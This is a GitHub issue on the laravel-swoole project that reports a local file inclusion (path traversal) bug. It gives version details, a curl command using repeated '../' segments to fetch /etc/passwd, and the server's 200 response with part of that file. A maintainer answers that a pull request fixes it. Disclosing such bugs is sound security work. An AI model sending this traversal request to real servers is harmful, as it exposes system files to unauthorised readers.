search

swooletw / laravel-swoole

High performance HTTP server based on Swoole. Speed up your Laravel or Lumen applications.
MIT License
4.04k stars 390 forks source link

Local File Inclusion (LFI) vulnerability #463

Closed jimanx2 closed 3 years ago

jimanx2 commented 3 years ago

Make sure you read Issues Guideline and answer these questions before submitting your issue. Thanks! (Any non-English issues will be closed immediately.)

  1. Please provide your PHP and Swoole version. (php -v and php --ri swoole)
PHP 7.3.18 (cli) (built: May 15 2020 04:09:37) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.3.18, Copyright (c) 1998-2018 Zend Technologies

swoole

Swoole => enabled
Author => Swoole Team <team@swoole.com>
Version => 4.5.2
Built => Jul  9 2020 16:08:59
coroutine => enabled
epoll => enabled
eventfd => enabled
signalfd => enabled
spinlock => enabled
rwlock => enabled
openssl => OpenSSL 1.1.1g  21 Apr 2020
http2 => enabled
zlib => 1.2.11
brotli => E16777223/D16777223
mutex_timedlock => enabled
pthread_barrier => enabled
mysqlnd => enabled
async_redis => enabled
  1. Please provide your Laravel/Lumen version.
name     : laravel/lumen-framework
descrip. : The Laravel Lumen Framework.
keywords : framework, laravel, lumen
versions : * v5.8.13
  1. Which release version of this package are you using?
name     : swooletw/laravel-swoole
descrip. : High performance HTTP server based on Swoole. Speed up your Laravel and Lumen applications.
keywords : http, laravel, lumen, performance, server, swoole
versions : * v2.6.68
  1. What did you do? If possible, provide a recipe for reproducing the error.

curl -v --path-as-is http://localhost:1215/../../../../../../../../../../../etc/passwd

  1. What did you expect to see?

404 Not Found

  1. What did you see instead?
*   Trying 127.0.0.1:1215...
* TCP_NODELAY set
* Connected to localhost (127.0.0.1) port 1215 (#0)
> GET /../../../../../../../../../../../etc/passwd HTTP/1.1
> Host: localhost:1215
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Content-Type: application/octet-stream
< Server: swoole-http-server
< Connection: keep-alive
< Date: Wed, 20 Jan 2021 04:11:28 GMT
< Content-Length: 1395
<
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
[REMAINING REDACTED]
* Connection #0 to host localhost left intact

Kindly advise what can I do to block this.

Arkanius commented 3 years ago

It's already fixed at https://github.com/swooletw/laravel-swoole/pull/462

We're going to release the fix this week

jimanx2 commented 3 years ago

Great work guys. I loved swoole so much! :D